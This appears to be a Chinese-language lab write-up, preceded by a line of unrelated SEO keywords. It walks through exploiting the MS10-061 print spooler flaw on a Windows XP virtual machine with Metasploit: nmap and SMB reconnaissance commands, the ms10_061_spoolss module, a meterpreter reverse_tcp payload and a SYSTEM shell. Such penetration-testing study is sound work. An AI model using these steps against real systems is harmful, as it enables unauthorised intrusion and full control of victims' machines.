学校做网站需要多少钱,代运营公司是什么意思,wordpress 评论加图片,app开发公司未按照合同开发注意事项#xff1a; kail首次打开metasploit#xff0c;会初始化数据#xff0c;可能会有点慢#xff0c;请耐心等待#xff01;本文仅供学习漏洞渗透测试#xff0c;不得用于其他非法用途#xff0c;否则造成的任何后果自负#xff01;#xff01;#xff01; 1.…注意事项 kail首次打开metasploit会初始化数据可能会有点慢请耐心等待本文仅供学习漏洞渗透测试不得用于其他非法用途否则造成的任何后果自负 1. Metasploit简介 Metasploit是一款开源的安全漏洞检测工具可以帮助安全和IT专业人士识别安全性问题验证漏洞的缓解措施并管理专家驱动的安全性进行评估提供真正的安全风险情报。这些功能包括智能开发代码审计Web应用程序扫描社会工程。详细介绍可以参考百度百科对 Mettasploit 的介绍。 2.打印后台程序服务模拟漏洞(CVE-2010-2729/MS10-061) 利用MSF中的攻击模块ms10_061_spoolssWindows打印后台程序没有充分的限制访问该服务的用户权限攻击者可以通过提交特制的打印请求在Windows系统目录%SystemRoot%\system32中创建文件。攻击者可以指定任何文件名包括目录遍历通过WritePrinter请求攻击者可以完全控制创建文件的内容。将文件写入到Windows系统目录%SystemRoot%\system32后通过WMI来部署恶意程序因为系统会自动运行%SystemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。 该漏洞首次被发现并被利用于著名的Stuxnet蠕虫俗称“震网” 3.实验环境 VMware虚拟环境 攻击机Kali Linux目标机Windows xp sp2 4.实验步骤 4.1 使用Nmap扫描目标机器是否存在NetBios和RPC服务 4.2 NetBios共享检测 4.3 使用MSF的ms10_061_spoolss模块攻击目标机 5.设置目标机环境 获取目标机IP创建打印共享默认是没有打印共享 1代开控制面板选择打印机和其他硬件2选择打印机和传真 3添加打印机4本地打印机不勾选“自动检测并安装即插即用打印机” 5选择使用LPT1端口 随便选一个打印机厂商和型号取个名字选择共享打印机 6.在Kali上检测打印机 1nmap扫描 nmap -sS -sU -O -p127-139,445 192.168.230.137 1 2)查找NetBIOS nmblookup -A 192.168.230.137 1 NetBIOS工作站名字123-13DFCFEDD88 NetBIOS组名WORKGROUP 7.访问SMB资源 smbclient -L \\123-13DFCFEDD88 -I 192.168.230.137 -N 1 看到了打印共享 8.使用MSF模块攻击 1载入模块搜索一下ms10_061 2)利用漏洞并查看需要配置的参数 3配置参数4设置Payload set payload windows/meterpreter/reverse_tcp 1 5设置Payload参数6攻击攻击完成后建立了远程会话恶意程序写入到目标机的%SystemRoot%\system32\2Uy3ygTXtpVrWD.exe,恶意程序是通过%SystemRoot%\system32\wbem\mof\5V4jdMrNNFWWSH.mof控制运行的。 7接下来可以执行一系列操作 getuidgetpid 可以看到我们获取了系统的system权限 此时执行shell可以进入目标机的命令行界面 至此整个攻击过程已经大体结束之后可以进行取证等一系列工作。最后感谢各位的阅读由于本人水平有限如有不足敬请谅解。